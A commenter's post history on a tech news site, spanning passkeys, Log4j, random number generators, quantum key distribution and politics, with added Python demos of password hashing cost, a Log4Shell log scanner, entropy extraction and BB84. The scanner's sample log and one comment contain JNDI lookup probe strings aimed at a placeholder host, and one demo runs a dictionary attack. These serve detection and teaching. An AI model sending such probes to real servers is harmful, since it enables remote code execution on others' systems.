Posts by Paul Uszak

77 publicly visible posts • joined 20 Jan 2009


Microsoft, Google do a victory lap around passkeys

Paul Uszak

So everyone's password is literally "SECRET"?

To you reading this post - is your password "SECRET" as well?

It must be as that's the only way 4000 passwords can be cracked per second. There's no other possible answer as all of the sites mentioned in this article obviously use salted key derivation functions (KDF). So rainbow tables are out with good salts (>=128 bits). And who's going to try millions of potential candidate passwords if all take 0.1 second to initially authenticate and then have exponential back off delays before the next login attempt is allowed? And where does all the RAM come from if the KDF is memory hard (e.g. Argon2) and requires hundreds of MB to directly try an encryption key?

I'm pretty sure that the NSA is not trying to crack my skateboarding turtle with parrot video site.

What am I missing?
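The salting and KDF-cost points raised in the post above, as an added example that is not part of the post or the article: it compares a bare salted SHA-256 with scrypt from the Python standard library on one constructed wordlist, and reports the per-guess cost of each so the attacker's offline rate for a given parameter choice can be seen directly. The salt length, scrypt parameters and wordlist are assumptions for the demo.

```python
"""Added example: what a salted, memory-hard KDF does to an offline guessing rate.

Compares a bare SHA-256 with scrypt from the standard library on the same
constructed wordlist. Parameters, salts and the wordlist are assumptions for
this demo, not anything from the article or the sites it names.
"""
import hashlib
import os
import time

if not hasattr(hashlib, "scrypt"):
    raise SystemExit("hashlib.scrypt needs a Python built against OpenSSL 1.1+")

SALT_LEN = 16                                  # 128-bit salt, enough to kill rainbow tables
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1   # 128*r*N = 16 MiB of RAM per guess

# Constructed wordlist; "SECRET" is the post's running joke.
WORDLIST = ["123456", "password", "qwerty", "letmein", "SECRET", "Tr0ub4dor&3"]


def hash_fast(password: str, salt: bytes) -> bytes:
    """Single SHA-256 over salt||password: salted, but cheap and GPU-friendly."""
    return hashlib.sha256(salt + password.encode()).digest()


def hash_scrypt(password: str, salt: bytes) -> bytes:
    """Memory-hard scrypt; every guess has to touch ~16 MiB of memory."""
    return hashlib.scrypt(password.encode(), salt=salt, n=SCRYPT_N, r=SCRYPT_R,
                          p=SCRYPT_P, maxmem=64 * 1024 * 1024, dklen=32)


def crack(target: bytes, salt: bytes, candidates, kdf):
    """Offline dictionary attack on one stored hash.

    Returns (password or None, guesses tried, seconds per guess). The salt is
    stored next to the hash, so the attacker always has it; what slows them
    down is the per-guess cost of kdf, not the secrecy of the salt.
    """
    t0 = time.perf_counter()
    tried = 0
    for cand in candidates:
        tried += 1
        if kdf(cand, salt) == target:
            return cand, tried, (time.perf_counter() - t0) / tried
    return None, tried, (time.perf_counter() - t0) / max(tried, 1)


def demo(password: str = "SECRET") -> dict:
    salt_a, salt_b = os.urandom(SALT_LEN), os.urandom(SALT_LEN)
    # Same password, two salts, two unrelated hashes: one precomputed table
    # cannot serve two accounts, let alone two sites.
    salts_differ = hash_scrypt(password, salt_a) != hash_scrypt(password, salt_b)

    fast = crack(hash_fast(password, salt_a), salt_a, WORDLIST, hash_fast)
    slow = crack(hash_scrypt(password, salt_a), salt_a, WORDLIST, hash_scrypt)
    return {
        "salts_differ": salts_differ,
        "fast": fast,       # (found, tried, sec/guess)
        "slow": slow,
        "slowdown": slow[2] / fast[2] if fast[2] > 0 else float("inf"),
    }


if __name__ == "__main__":
    r = demo()
    print(f"salts differ: {r['salts_differ']}")
    for name in ("fast", "slow"):
        found, tried, per = r[name]
        print(f"{name:4}: found {found!r} after {tried} guesses, "
              f"{per * 1e6:,.1f} us/guess -> {1 / per:,.0f} guesses/s on one core")
    print(f"scrypt is {r['slowdown']:,.0f}x slower per guess than SHA-256")
```

The salt is not a secret and the attacker gets it with the hash; what sets the guessing rate is the cost of one KDF evaluation, which is why the scrypt (or Argon2) parameters, not the salt, are the tunable that matters. Online rate limiting and back-off are a separate control that only applies while the hash has not leaked.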

Tesla to license Full Self-Driving stack to other automakers, says Musk

Paul Uszak

Re: Attempting to Outsource Potential Legal Liabilites

And in the case of a fully self driving car clocked by a speed camera doing 40 in a 20 zone... Who or what gets the points?

Let's have a chat about Java licensing, says unsolicited Oracle email

Paul Uszak

Audit? We don't want no audit.

What's this about Oracle "auditing" companies? By the Oracle police? We use Java where and how we want. If you want to "audit" us, I suggest bringing a court order, armed police or destroyer droid. Otherwise you risk annoying James on the front desk (ex-Royal Marine sergeant). But doesn't work Tuesdays... damn...

Florida man insists he didn't violate the law by keeping Top Secret docs

Paul Uszak

Re: Incredibly dangerous/stupid.

But that's my point. Walt will have so much dirt on Trump. There's probably other 'stuff' that hasn't attracted the FBI's attention yet. If Walt starts thinking that there is no love for him from Trump (or at least his team), he might think that he has to look after himself too. It is so in Trump's interest to keep Walt sweet as he can burn him. The FBI would drop charges against Walt in a second if they could get a President.

Paul Uszak

Incredibly dangerous/stupid.

I can't believe this. Why did Trump/his defence team not make absolutely sure that Walt had every resource he possibly needed? What if Walt now gets angry? Raises hand, says "Plea deal please. If you clear me, I'll give you the President"...

UK seeks light-touch AI legislation as industry leaders call for LLM pause

Paul Uszak

Re: AI MPs?

Hence the suit and wig. And keep the citizens at least 100 yards away.

Paul Uszak


I foresee a future (perhaps next month), when researchers drape a cheap suit and wig over a ChatGPT server and call it an MP. How will we tell the difference?

Anyone want an International Space Station? Slightly used

Paul Uszak

It's really obvious what to do...

“Code zero, zero, zero. Destruct. Zero!”

By order of Canonical: Official Ubuntu flavors must stop including Flatpak by default

Paul Uszak

Thank goodness!

My experience of all of these 'all-dependencies' installation systems (appimage/flatpak/snap) is that they don't work. Examples:-

Most can't see /tmp so you end up putting temporary files all over the place, making your machine look like a Windows one.

Some can't see the network. Just where do you put your files?

Some can't see printers. Like Inkscape (which I kinda understand as it's an icon generator, but).

Appimaged Audacity can't even produce sound! I wonder how that was tested?

Only apt seems to work properly with full access to resources. Unfortunately politics means that many applications are no longer available in that form. Why does Linux desktop have to be so difficult? Because it's free.

Conversational AI tells us what we want to hear – a fib that the Web is reliable and friendly

Paul Uszak

I'm not worried.

I too have a stash of toilet paper and tuna fish (one can be bartered for the other). But, ChatGPT/Bard/AI are scary at the moment as they're free running (as in their owners can do what they want). But wait till an 'event' occurs. Three examples:-

1. The AI comes up with a totally new 'challenge' that directly leads to the death of a child.

2. The AI produces lyrics that are extremely similar to something Taylor Swift wrote.

3. The AI allows some punter to get 10 straight wins on the horses.

Then the AI systems will be the scared ones storing e-toilet paper as regulation falls from the sky...

India sets USB-C charging deadline for smartphones

Paul Uszak

Re: So much for "Brexit freedoms" eh ?

If Duxit and Bexit are true, then that's bad news for England.

The EU president publicly stated that at all costs, it must be the case that being outside the EU is worse than being inside. That could mean them hardening their attitude to England, further increasing our transaction costs and no prospect of resolving the Northern Ireland Protocol to disincentivise the Dutch and Belgians.

But then, that's exactly Westminster's attitude to Scottish independence. So ho hum...

Paul Uszak

Re: So much for "Brexit freedoms" eh ?

And, the cables will have to have a current capacity up to 4 electro-pints.

Open source 'Office' options keep Microsoft running faster than ever

Paul Uszak

"I have never seen a company using an opensource office tool"

That's right. There aren't any unless they're mom and daughter sandwich shops. Imagine appealing a High Court ruling with LibreOffice. Imagine tendering for a new hospital build with LibreOffice. Imagine sending a piece to Vogue with LibreOffice. No, no, no.

The reason no one uses LibreOffice is that no one of stature uses LibreOffice. Why else do we teach our school children to use MS products?

EU makes USB-C common charging port for most electronic devices

Paul Uszak

Apple will still sell proprietary chargers anyway and make more money still.

What's really in the Radio Equipment Directive? Has anyone checked the detail? The rules now say there must be a USB-C port on those relevant devices.

So what? That doesn't affect chargers. USB-C is a data cable as well as a power cable. Apple will make smarter chargers that talk to the OS/firmware of the device and acknowledge each other. Probably with some cryptographic signature. Common 3rd party chargers will not be able to replicate the handshake, so Apple products will only charge with Apple signed chargers. Then forcing you to buy either genuine Apple, or Apple licensed chargers. And due to all of the additional complexity thrust upon them by the Socialist EU bureaucracy, Apple unfortunately have to charge more for them. Remember that it's for your safety which is Apple's number one priority.

Shame on you EU. I had an old Dell 19V charger with a really common jack plug. Yet it talked over the DC wires with the laptop's firmware so no 3rd party charger would work. That was probably for my safety too. And it's why I no longer buy Dell anything. Also think John Deere tractors.

New York to get first right-to-repair law for electronics

Paul Uszak

We don't want that here.

Why the hell are we talking about the US on this English website? None of this applies here, and the English are too stupid to allow it. Safety comes first and foremost. Don't forget that the CGI Lurpak man on a skateboard wore a helmet in case he fell and got hurt. I'm honestly ashamed.

A précis is: How can I change my oil filter on my 2022 Mazda 6? How do I change my HV light bulbs without being killed? I can't because the service manual is secret. Get that done Boris, or would you rather have your flat redecorated courtesy of Ford?

Canonical puts out last update to Ubuntu 20.04 before 22.04

Paul Uszak

Re: Compare cars and computers

Lucky you.

My car's SatNav needs a major update - it's constantly in the Grand Canal in Venice (£150), the screen wash is gone, oil & filter needs changing and the engine flushing. It never fully recovered from me accidentally putting diesel into the petrol tank. Sump plug leaks. Plus the tyres are half flat as they've perished. Wipers are split and the driver's side mirror is taped on. It has no 2nd gear.

God how I wish I could just go online and update the damn car...

P.S. Before anyone says it, I don't mean via webuyanycar.com. I'm attached to Henry.

Something 4,000 light years away emitted strange radio bursts. This is where we talk to scientists for actual info

Paul Uszak

Re: Lizards

Don't fret Rob. Just wait till 2024.

OpenShell has been working on a classic replacement for Windows 11's Start menu

Paul Uszak

Yet what about Windows 12 & 13's breakages?

I've read that the advanced dev/marketing teams are looking towards Windows 13 after just finalising the bulk of 12's appearance. Wired have MS poaching several of the Apple graphics artists. I guess MS have to do that to compete with iOS 16's release. What's all that going to break?

Unless 13 is considered unlucky, and they go with Win'26.

The James Webb Space Telescope has only gone and deployed its primary mirror

Paul Uszak

"A camera would be nothing be(sic) PR."

A. Does anyone remember the oxygen consumption of Apollo 14? What is the current main data transmission rate of Voyager 1? Can anyone imagine the shape of dust storms on Mars?

B. Does anyone remember Neil Armstrong climbing down the ladder onto the Moon? Have you ever witnessed a total solar eclipse? Have you ever witnessed a launch of the space shuttle?

Which excites you the most, A or B? PR is everything. Unfortunately scientists and engineers don’t really understand that. Science does not speak for itself. If the JWST didn’t have cameras, then put them on. Figure it out; it’s NASA. Hire an advertising firm. They did it for Apollo 11 which also didn’t need the additional complexity.

And this is what Musk, Bezos and Branson understand. This is why the Millau Viaduct is widely known as having been built by Norman Foster. This is why there was Trump, and why he could serve another two terms.

I respectfully yet forcefully suggest that all science and engineering courses should include marketing components. Otherwise we’re all going to end up like Nebraska.

Secure boot for UK electric car chargers isn't mandatory until 2023 – but why the delay?

Paul Uszak

Re: Solution to car charger issues...

Tsk, tsk. Of course I was referring to the new pound coins. The ones with Bluetooth.

Paul Uszak

Solution to car charger issues...

Why not just put pound coins into the all mechanical machine? Like those little bubble gum dispensers. Then turn the silver handle to get the juice. Hack that. It could also dispense bubble gum for use whilst charging.

Log4j RCE latest: In case you hadn't noticed, this is Really Very Bad, exploited in the wild, needs urgent patching

Paul Uszak

I suggest that this is a manifestation of the open source movement, and I'm being nice (honest). It would take a lot to persuade a commercial vendor to include all this (unnecessary) stuff into a retail library. Time is money and there's probably little user demand for JNDI/RMI/LDAP features in logging.

But all commercial/managerial sense goes out of the window for most open source stuff. If you're doing it as an unpaid hobby, then why not? It's fun. Some might even consider it art. Anything goes if there's no market strategy (and there's no market). New features creep in unchecked as young developers 'play' with the latest cool thing, irrespective of whether there's any demand for them. Therein lies the RMI and the problem...

Paul Uszak

This is all very complicated and I don't understand it. A logging library needs JNDI, RMI and LDAP functionality? Beyond PRINT (message)? Maybe it's a joke. Very fortunately, I use JULI Commons and I've just found:-

GET /$%7Bjndi:dns:// HTTP/1.1" 404 878 "${jndi:dns://}

in my web server log file....
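The probe line the post quotes is the unobfuscated form of the Log4Shell (CVE-2021-44228) scanning traffic; the added example below, which is not from the post or from any Log4j project code, is a small access-log scanner that URL-decodes (including double encoding) and folds the lookup tricks seen in the wild (${lower:j}, ${upper:J}, ${::-j}, ${env:X:-j}) before matching ${jndi:...}. The sample log lines are constructed for the demo on TEST-NET addresses, modelled on the one line in the post.

```python
"""Added example: spotting Log4Shell (CVE-2021-44228) lookup probes in access logs.

Normalises URL encoding and the Log4j lookup tricks seen during the Log4Shell
wave before matching ${jndi:<scheme>...}. The log lines are constructed for
the demo (TEST-NET addresses), modelled on the single line the post quotes.
"""
import re
from urllib.parse import unquote

# ${lower:x} / ${upper:x} evaluate to x; ${name:key:-dflt} and ${::-dflt} evaluate to dflt.
_CASE = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^{}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def normalize(text: str, rounds: int = 5) -> str:
    """URL-decode (possibly several layers) and fold simple lookup obfuscations.

    Each round decodes once and collapses innermost ${lower:}/${upper:} and
    default-value lookups; stops when a round changes nothing.
    """
    for _ in range(rounds):
        folded = unquote(text)
        folded = _CASE.sub(lambda m: m.group(1).lower(), folded)
        folded = _DEFAULT.sub(lambda m: m.group(1), folded)
        if folded == text:
            break
        text = folded
    return text


def find_probe(line: str):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a probe, else None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Yield (line_number, scheme, original_line) for every suspicious log line."""
    for number, line in enumerate(lines, 1):
        scheme = find_probe(line)
        if scheme:
            yield number, scheme, line


# Constructed combined-format log lines (not real traffic); line 1 mirrors the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:21:05:11 +0000] "GET /$%7Bjndi:dns:// HTTP/1.1" 404 878 "${jndi:dns://}" "-"',
    '198.51.100.3 - - [10/Dec/2021:21:06:40 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:21:07:02 +0000] "GET /?x=${${lower:j}ndi:ldap://203.0.113.5/a} HTTP/1.1" 400 0 "-" "-"',
    '203.0.113.9 - - [10/Dec/2021:21:07:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${j${::-n}di:rmi://203.0.113.5/b}"',
    '192.0.2.44 - - [10/Dec/2021:21:08:30 +0000] "GET /%2524%257Bjndi:ldap://192.0.2.10/x%257D HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for number, scheme, line in scan(SAMPLE_LOG):
        print(f"line {number}: jndi:{scheme} probe -> {line[:70]}...")
```

A hit on a 404 line only says someone is scanning; the lines to worry about are the ones where a vulnerable Log4j instance actually logged the request (User-Agent and Referer are logged by default in many setups, which is why the probe is placed there too), so this scanner is a triage step, not proof of compromise.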

How to destroy expensive test kit: What does that button do?

Paul Uszak

Re: Expensive test equipment

Alternative networks? You mean police/FBI Stingers?

ESA's Mars Express picks up plaintive bleeps of China's Zhurong rover, adding much-needed comms redundancy

Paul Uszak

Faster than Plusnet then...

Another brick in the (kitchen) wall: Users report frozen 1st generation Google Home Hubs

Paul Uszak

Re: Why is Google not liable for damages?

With respect, bollocks.

Go on and try. Go to Currys and try to take back your three year old TV that's now been bricked. Explain your consumer rights. Draw a diagram. Cause a scene. The Saturday girl will press the panic alarm, the police will be called. Then you might be tasered because that's the most convenient thing to do before lunch break. The police might use chemical weapons on you too. There were 492,000 recorded incidents where a police officer reported the use of force on an individual in England and Wales in the year to March. Argos is probably the same.

If it bricks, count yourself lucky that it was the device and not you. I'm referencing Jordan Walker-Brown who'll never walk again. Now about that TV...

Paul Uszak

Why is Google not liable for damages?

Isn't it time that legislation was passed to recover damages from the up-daters?

If you take your car to the garage for an MOT and it falls off the ramp and is damaged, the garage is liable. Same with services delivered to patients at a hospital. Surely Google/IT provider should be liable for damages too. Either fix the code, or if totally bricked replace it. This would force companies to test upgrades rather than have the end users do so.

I understand that software is a little different to hardware, but is it actually? Is it only different in the consumers' minds because they want us to think that way? Now extrapolate and go forward in time. I foresee all products having embedded software and network connectivity. What if all my beer cans get bricked due to a wonky ASDA.OS up-date and I can't remotely open them? I'd want pre-cooled replacements.

Perhaps the consumer needs a paradigm shift.

Product release cycles are killing the environment, techies tell British Computer Society

Paul Uszak

Complete waste of time.

:-( I can nullify every single argument anyone will ever make with one simple word: "Safety".

Think your phone is snooping on you? Hold my beer, says basic physics

Paul Uszak

Re: This is mildly terrifying

"If you give me six lines written by the hand of the most honest of men, I will find something in them which will hang him."

It had to happen: Microsoft's cloudy Windows 365 desktops are due to land next month

Paul Uszak

Re: So now

You've misunderstood the Book:-

A "new heaven" and "new earth" (Azure) replace the old heaven and old earth. There is no more suffering or death. (21:1–8) (no more need for patching).

God comes to dwell with humanity in the New Jerusalem. (21:2–8) (Bill walks amongst us/the poor, not in armoured helicopter).

Description of the New Jerusalem. (21:9–27) (Microsoft campus on Mars).

The River of Life and the Tree of Life appear for the healing of the nations and peoples. The curse of sin is ended. (22:1–5) (Linux is defeated and we are shown the way of the Cloud).

And in Conclusion:-

Bill's reassurance that Windows 12's coming is imminent. Final admonitions. (22:6–21)

Tim Cook: Sideloading is a disaster and proposed App Store reforms would harm user privacy and security

Paul Uszak

Re: It wouldn't be for people who like to tinker

Deleted by unpatriotic socialists who don't respect the will of the people. This is why President Trump is endeavouring to curb the bigotry and censorship of big tech.

Paul Uszak

Re: It wouldn't be for people who like to tinker

>Firearms have the potential to hurt people and few other uses.

One of those uses is to enforce democracy.

Kaspersky Password Manager's random password generator was about as random as your wall clock

Paul Uszak


Oh dear. Rolling your own crypto :-(

Please read https://crypto.stackexchange.com/questions/43272/why-is-writing-your-own-encryption-discouraged .

Plus 6.1E15 is nothing. Sorry. Stick to the tried stuff, or try to use one time pads if security is of such concern. But for that you'll need access to a trusted TRNG. Which you'll have to build yourself. 100% unbreakability comes at a price.

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

ERNIE: It wasn't a differencing operation. It was simply amplifying the electrical noise on a QS92 regulating valve (http://www.r-type.org/exhib/aag0022.htm). That then gated a counter and the numbers popped out using:- https://i.stack.imgur.com/cHpf9.png.

TrueRND: I too have one :-( Not really happy with it. But please remember on what article we are commenting on/getting excited. There is a concept called computational indistinguishability. That means you cannot differentiate a pseudo random sequence from a truly random sequence, no matter how hard you try. It's just the maths/statistics. That applies to TrueRND too. That's why the only solution that provides 100% confidence is a self build.

But most don't care, so ignore my ranting and I've got the lawn to mow...

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

It's this easy, If you have batteries and a Zener diode:- http://www.reallyreallyrandom.com/zener/breadboard/

Just suck up the entropy with a microcontroller of your choice.
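What "sucking up the entropy" looks like once the raw bits are off the microcontroller, as an added example that is not from the post or from the linked breadboard page: a simulated, biased comparator stream stands in for the Zener noise (the bias and independence are assumptions of the demo), it is passed through a Von Neumann extractor, and the min-entropy before and after is estimated with the most-common-value estimator from NIST SP 800-90B section 6.3.1.

```python
"""Added example: turning a biased noise-source bit stream into usable entropy.

A simulated comparator output (assumed P(1)=0.7, independent bits) stands in
for the Zener breadboard; the real thing would come off a microcontroller's
ADC or input pin. Shows a Von Neumann extractor and the most-common-value
min-entropy estimator from NIST SP 800-90B section 6.3.1.
"""
import math
import random
from collections import Counter


def von_neumann(bits):
    """Von Neumann extractor: read pairs, 01 -> 0, 10 -> 1, 00 and 11 dropped.
    Removes bias from independent bits at the cost of most of the input;
    it does nothing about correlation between successive bits."""
    return [bits[i] for i in range(0, len(bits) - 1, 2) if bits[i] != bits[i + 1]]


def min_entropy_mcv(samples):
    """NIST SP 800-90B 6.3.1 most-common-value estimate, bits per sample:
    p_u = min(1, p_max + 2.576*sqrt(p_max*(1-p_max)/(L-1)));  H = -log2(p_u).
    Assumes IID samples; for a non-IID source 800-90B's other estimators apply."""
    L = len(samples)
    p_max = max(Counter(samples).values()) / L
    p_u = min(1.0, p_max + 2.576 * math.sqrt(p_max * (1 - p_max) / (L - 1)))
    return -math.log2(p_u)


def biased_source(n, p_one=0.7, seed=1):
    """Constructed stand-in for raw comparator bits with P(1) = p_one (assumption)."""
    rng = random.Random(seed)
    return [1 if rng.random() < p_one else 0 for _ in range(n)]


def analyse(n=40000, p_one=0.7):
    """Raw vs debiased stream: length, bias and min-entropy per bit."""
    raw = biased_source(n, p_one)
    clean = von_neumann(raw)
    return {
        "raw_len": len(raw),
        "raw_min_entropy": min_entropy_mcv(raw),
        "clean_len": len(clean),
        "clean_ones": sum(clean) / len(clean),
        "clean_min_entropy": min_entropy_mcv(clean),
    }


if __name__ == "__main__":
    r = analyse()
    print(f"raw  : {r['raw_len']} bits, min-entropy {r['raw_min_entropy']:.3f} bit/bit")
    print(f"clean: {r['clean_len']} bits, P(1)={r['clean_ones']:.3f}, "
          f"min-entropy {r['clean_min_entropy']:.3f} bit/bit")
```

The extractor throws away roughly four fifths of a 70/30 stream, which is the usual price of a self-built source: budget the raw bit rate accordingly, and treat the min-entropy figure as an upper bound until the stream has also been checked for correlation, since the most-common-value estimator is blind to it.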

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

Actually NIST doesn't. Not for crypto. That's a common fallacy. It's in the front matter, quoting from NIST SP 800-90B:-

"This publication has been developed by NIST in accordance with its statutory responsibilities under the Federal Information Security Modernization Act (FISMA) of 2014, 44 U.S.C. § 3551 et seq. (https://www.congress.gov/113/plaws/publ283/PLAW-113publ283.pdf), Public Law (P.L.) 113-283. NIST is responsible for developing information security standards and guidelines, including minimum requirements for federal information systems, but such standards and guidelines shall not apply to national security systems without the express approval of appropriate federal officials exercising policy authority over such systems. "

Which says:-

"§ 3553. Authority and functions of the Director and the Secretary:-

‘‘(d) NATIONAL SECURITY SYSTEMS.—Except for the authorities and functions described in subsection (a)(5) and subsection (c), the authorities and functions of the Director and the Secretary under this section shall not apply to national security systems.

‘‘(e) DEPARTMENT OF DEFENSE AND INTELLIGENCE COMMUNITY SYSTEMS.—(1) The authorities of the Director described in paragraphs (1) and (2) of subsection (a) shall be delegated to the Secretary of Defense in the case of systems described in paragraph (2) and to the Director of National Intelligence in the case of systems described in paragraph (3). "

So, good enough for the people, but not (US) national security?

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

Read you loud and clear. Some of us are already trying to do that:-


Quantum Key Distribution: Is it as secure as claimed and what can it offer the enterprise?

Paul Uszak

Re: So the whole point is?

Well I think that you'd have to be in the presence of the fibres. Perhaps you could tie a really tight knot that would choke off the internet. The keys wouldn't be able to get through if the knot radius was less than the diameter of standard cryptographic photons. Or use plumbers' freezing spray to really slow them down.

Paul Uszak

Re: So the whole point is?

Err, no. The system is quantum as it deals with the generation, transmission and measurement of photon polarizations. The point is (quoting from the BB84 paper, https://arxiv.org/pdf/2003.06557.pdf):-

"...when information is encoded in non-orthogonal quantum states, such as single photons with polarization directions 0, 45, 90, and 135 degrees, one obtains a communications channel whose transmissions in principle cannot be read or copied reliably by an eavesdropper ignorant of certain key information used in forming the transmission. The eavesdropper cannot even gain partial information about such a transmission without altering it in a random and uncontrollable way likely to be detected by the channel's legitimate users. "

So I can send you 'stuff' with 100% confidence that no one has read it.

Paul Uszak

Re: Abe Lincoln knew the truth about QKD.

Please don't conflate a self-serving political system and the industrial-military complex with a cryptographic protocol. The article was about the protocol. This is why these threads go off the rails.

If you have insight into how QKD is cryptographically flawed that the organisations I listed don't, please put up. Mathematical detail would be a bonus :-)

Paul Uszak

Re: my "QKD for managers"

Oh dear. You've gotten the concept upside down. Interception is irrelevant. The beauty of QKD is that it is ALL about identity. The identity management comes from the Observer Effect of quantum physics. Any photon that is observed changes state. That's fundamental to the Universe, and exempt from any hardware resource considerations.

A "true MITM" relay would introduce measurable basis errors at the rate of an additional 50%. When Alice and Bob compare their expected results, the attack is detected. That is QKD's raison d'etre. The original BB84 article is here: https://arxiv.org/pdf/2003.06557.pdf

And that's why everyone is getting QKDNs.
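The intercept-resend relay discussed in the post above, as an added toy simulation that is not from the post or from the BB84 paper: Alice sends bits in random bases, an optional Eve measures each photon in a guessed basis and re-sends it in that basis, Bob measures in his own random basis, and the two sift on matching bases and compare a sample. The run reports the error rate Eve induces on the sifted key (about a quarter of the sifted bits for a full intercept-resend, since Eve guesses the wrong basis half the time and each wrong guess gives Bob a random bit). The abort threshold is an assumption of the demo.

```python
"""Added example: BB84 key sifting with and without an intercept-resend attacker.

A toy simulation (not the paper's code): bases are 0 = rectilinear (0/90
degrees), 1 = diagonal (45/135). Measuring in the wrong basis yields a
random bit and leaves the photon in the measured state, which is what an
intercept-and-resend Eve has to send on to Bob.
"""
import random

QBER_ABORT = 0.11   # assumption: a commonly quoted abort threshold for BB84


def measure(bit, prep_basis, meas_basis, rng):
    """Same basis: the bit is read correctly. Other basis: random outcome."""
    return bit if prep_basis == meas_basis else rng.randrange(2)


def bb84(n, eavesdrop, seed=42):
    """Run n photons; return sifted-key size, QBER and whether the run aborts."""
    rng = random.Random(seed)
    alice_bits = [rng.randrange(2) for _ in range(n)]
    alice_bases = [rng.randrange(2) for _ in range(n)]
    bob_bases = [rng.randrange(2) for _ in range(n)]

    bob_bits = []
    for bit, basis, b_basis in zip(alice_bits, alice_bases, bob_bases):
        if eavesdrop:
            # Eve guesses a basis, measures, and re-sends in the basis she used.
            e_basis = rng.randrange(2)
            bit, basis = measure(bit, basis, e_basis, rng), e_basis
        bob_bits.append(measure(bit, basis, b_basis, rng))

    # Sifting over the public channel: keep positions where Alice and Bob chose
    # the same basis. Without Eve those bits agree exactly.
    sifted = [(a, b) for a, b, x, y in zip(alice_bits, bob_bits, alice_bases, bob_bases)
              if x == y]
    errors = sum(1 for a, b in sifted if a != b)
    qber = errors / len(sifted)
    return {"sifted": len(sifted), "qber": qber, "abort": qber > QBER_ABORT}


if __name__ == "__main__":
    for eve in (False, True):
        r = bb84(4000, eavesdrop=eve)
        print(f"eavesdrop={eve!s:5}: sifted {r['sifted']} bits, "
              f"QBER {r['qber']:.3f}, abort={r['abort']}")
```

In a real deployment the comparison is done on a disclosed sample of the sifted key and the rest goes through error correction and privacy amplification; the simulation skips both and only shows the detection signal, which is the property the protocol rests on.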

Paul Uszak

Abe Lincoln knew the truth about QKD.

He's attributed to have said "You can fool all the people some of the time and some of the people all the time, but you cannot fool all the people all the time."

But that's exactly what quantum deniers (QD) are espousing. Any relation to QA? The banks, the governments (https://spacenews.com/governments-ally-for-federated-quantum-encryption-satellite-network/), the universities, the militaries, Europe (https://spacenews.com/europe-picks-euroqci-satellite-quantum-communications-consortium/) are all going for QKDNs because they're secure when correctly implemented. They allow mathematically unbreakable one time pads to be distributed and used.

But of course they're all fools. We here know the truth, eh?

Paul Uszak

Re: my "QKD for managers"

And perhaps a more balanced answer: https://crypto.stackexchange.com/a/51364/23115.

Reiterating: The fundamental point is that you need to keep implementation distinct from protocol. AES-GCM is also pretty weak if the key is on a Post-it stuck to the monitor. As is RSA/DH if the random number generator is weak/subverted. Everyone should just calm down.

Mine's the one time pad over there...

23. 712. 3. 608. 45. 89. 11. 332. 841. 255. You want more? Cloudflare and pals are streaming 'em live from new RNG API

Paul Uszak

/dev/random ?

For those lucky enough to use Linux, there's always /dev/random for information theoretic secure random numbers. That will get you tens of kbits/hr simply using your machine, and 20s of kbits/hr using PornHub. And there's /dev/urandom for infinite amounts of cryptographically secure numbers. We need education, not a lava lamp service...

It's nearly 2019, and your network can get pwned through an oscilloscope

Paul Uszak

The Rigol 1054 is one of the most popular scopes in the DIY space. It's brilliant for the price of ~£370. And it's wide open at the back too. No authentication at all, helped along with automatic DHCP so all one need do is to shove a network cable up its ass and it's online.

You get full remote control of the scope, as well as total access to the sampling data. So you can read the wave forms from my little circuits. Great! The real issue is that this is a powered and networked computer with no sign on whatsoever. It may already be the case that it can be made to execute code remotely, due to some bug in the LXI command interface. What if you then can load malware onto it via Ethernet? Could you simply brick it for a bit of fun, or use it as a clandestine staging post for further exploits? Stuxnet-LXI perchance?

My nightmare is that my oscilloscope might be taken over and connect with my on-line wine chiller...

RIP... almost: Brit high street gadget shack Maplin Electronics

Paul Uszak

Why are you all dissing Maplins?

I don't understand what everyone's on about. They're an excellent shop. Look, you can buy a drill - https://www.maplin.co.uk/p/maplin-18v-lithium-ion-cordless-drill-n29lk. Just where else could you get one of these fine electronic devices (with built in batteries)? Not Toys'R'Us eh? And it's in stock at my local store. Save me a trip to Argos that will...

SK Telecom makes light of random numbers for IoT applications

Paul Uszak

I'll be queuing to buy one if I can just prove that mine's not simply outputting SHA256[NSAKey || CPUId, time_t].

Why don't people secure their IoT gadgets? 'It's not my problem'

Paul Uszak

So In summary...

... is it better? Considering all the problems of connected devices, and all the advantages, are we better off? Consider this in the wider context. It provides jobs and entertainment. Some smart stuff is actually life saving / life enhancing for the disabled. And it helps the terrorists. Some smart stuff also kills terrorists. So...

[Personally, I don't think that we are holistically better off with the IoT but I'm getting old and grumpy.]

Google's driverless car: It'll just block our roads. It's the worst

Paul Uszak

The courts will decide

Google and technology will not decide the viability of driverless vehicles. The courts will. What happens when the first child jumping out into the road is killed? Cue the lawyers. It will go to trial and the courts will have to decide who the defendant(s) are. It's likely that they will just ban that type of vehicle as surely as Segways are banned in Europe.

BMW tried a similar "advancement" when they brought out that weird motorbike with a fully surround roll cage. The idea that you wear a safety harness and have a roll cage might mean that you don't have to wear a safety helmet, thus making a motorbike more appealing. Unfortunately, the law says that on all two wheeled vehicles the driver has to wear a helmet. The project was cancelled.

NASA quandary: Should Curiosity channel Fast and Furious for Martian dune-buggy jump?

Paul Uszak

Re: So, they landed it in a hole...

"NASA is really, really good at going slow and careful."

Tell that to the relatives of the Challenger crew.